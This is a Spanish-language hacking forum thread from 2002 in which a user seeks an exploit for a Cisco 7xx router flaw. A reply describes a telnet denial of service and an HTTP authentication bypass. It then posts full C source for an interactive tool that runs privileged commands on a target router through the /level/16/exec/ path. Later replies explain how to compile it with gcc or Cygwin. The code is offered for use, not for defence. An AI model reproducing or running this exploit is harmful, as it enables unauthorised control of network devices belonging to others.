14-02-2002, 19:02
Tengo un exploit o un vulnerabilidad para un router Cisco. Os pongo las paginas para que os las mireis si quereis decirme algo.http://packetstorm.widexs.nl/9903-exploits/cisco.7xx.tcp.http.txt
http://www.cisco.com/warp/public/770/7xxconn-pub.shtml
No estoy seguro para que sirve esta vulnerabilidad
Hola:
No entiendo lo q preguntas. Q quieres, una traduccion?
Pregunto si alguien conoce o entiende el exploit, ya que no he podido encontrar el exploit. En este texto sólo se habla de los fallos, pero no da ni codigo fuente para explotarlos ni nada parecido.
La traducción no es necesaria, aunque tampoco se mucho de ingles pero bueno, me apaño.
En definitiva si pudises ayudarme a buscar un codigo fuente para el fallo numerado por CISCO CSCdm03231.
Than you
OK
si encuentro algo te aviso
07-03-2002, 17:20
Lo cierto que que no se mucho de Exploits, pero la idea es que si tienes una cuenta de usuario en un ordenata puedes subir el exploit y ejecutarlo desde un Shell y conseguir así acceso de Root.
Para generar exploits lo mejor es saber programar en algun lenjuaje de programacion. En linux se puede aprobechar los scripts de Shell, que son algo así como los bat de Dos, pero son especificos para Shell.
Un saludo
Los bugs ke se mencionan en esa page afectan a los routers Cisco 7xx.
El primer bug es una denegacion de servicio causada por una serie de conexiones TCP al puerto (23) Telnet del router,o sea , ke si bombardeas el 23 del router con conexiones TCP pofff keda parvo..jajaj.
El 2º habla de un bug en el servidor HTTP por el cual es posible saltarse la autentificacion y ejecutar comandos en el router con nivel 15 (el nivel con mas privilegios) este bug se explotaria de esta forma
http://<device_addres>/level/xx/exec/....
Donde xx es un numero entre 16 y 99 porke cada Cisco IOS tiene una combinacion diferente.
Esto igual es mas comodo para el server web del Cisco.
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_PORT 80
#define PROMPT "\ncisco$ "
int usage (char *progname) {
printf ("Usage:\n\t%s server\n", progname);
exit(-1);
}
int main (int argc, char *argv[]) {
struct hostent *he;
struct sockaddr_in sin;
int sck, i;
char command[256], buffer[512];
if (argc < 2)
usage(argv[0]);
if ((he = gethostbyname(argv[1])) == NULL) {
perror("host()");
exit(-1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(HTTP_PORT);
sin.sin_addr = *((struct in_addr *)he->h_addr);
while (1) {
if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
perror("socket()");
exit(-1);
}
if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
perror ("connect()");
exit(-1);
}
printf (PROMPT);
fgets (command, 256, stdin);
if (strlen(command) == 1)
break;
for (i=0;i<strlen(command);i++) {
if (command[i] == ' ')
command[i] = '/';
}
snprintf (buffer, sizeof(buffer),
"GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command);
write (sck, buffer, strlen(buffer));
memset (buffer, 0, sizeof(buffer));
while ((read (sck, buffer, sizeof(buffer))) != 0) {
if ((strstr(buffer, "CR</A>")) != 0) {
printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
memset (buffer, 0, sizeof(buffer));
break;
} else if ((strstr(buffer, "Unauthorized")) != 0) {
printf ("Server not vulnerable\n");
exit(-1);
} else {
printf ("%s", buffer);
memset (buffer, 0, sizeof(buffer));
}
}
}
printf ("Thanks...\n");
exit(0);
}
Mandala como siempre, un makina
Gracias por la respuesta MANDALA. Lo unico que me falta es aprender a compilar estos exploits. Si me pudieras decir donde puedo encontrar las librerias o .h que están en el codigo fuente te lo agradecería
Pues para compilar los exploits te serviria un linux.Si no lo tienes prueba a instalarte el Cygwin y acuerdate de instalar el gcc o algun compilador de C cuando instales el cygwin.
Cygwin es un entorno Unix para Windows. Este consiste de dos partes: una DLL (cygwin.dll) la cual actúa como un emulador Unix el cual provee funcionalidades API. Una colección de herramientas para Unix, la cual provee un aspecto Unix/Linux
La Cygwin DLL trabaja con todas las versiones de Windows desde Windows 95 con escepción de Windows CE.
Para más información: www.cygwin.com
Marcadores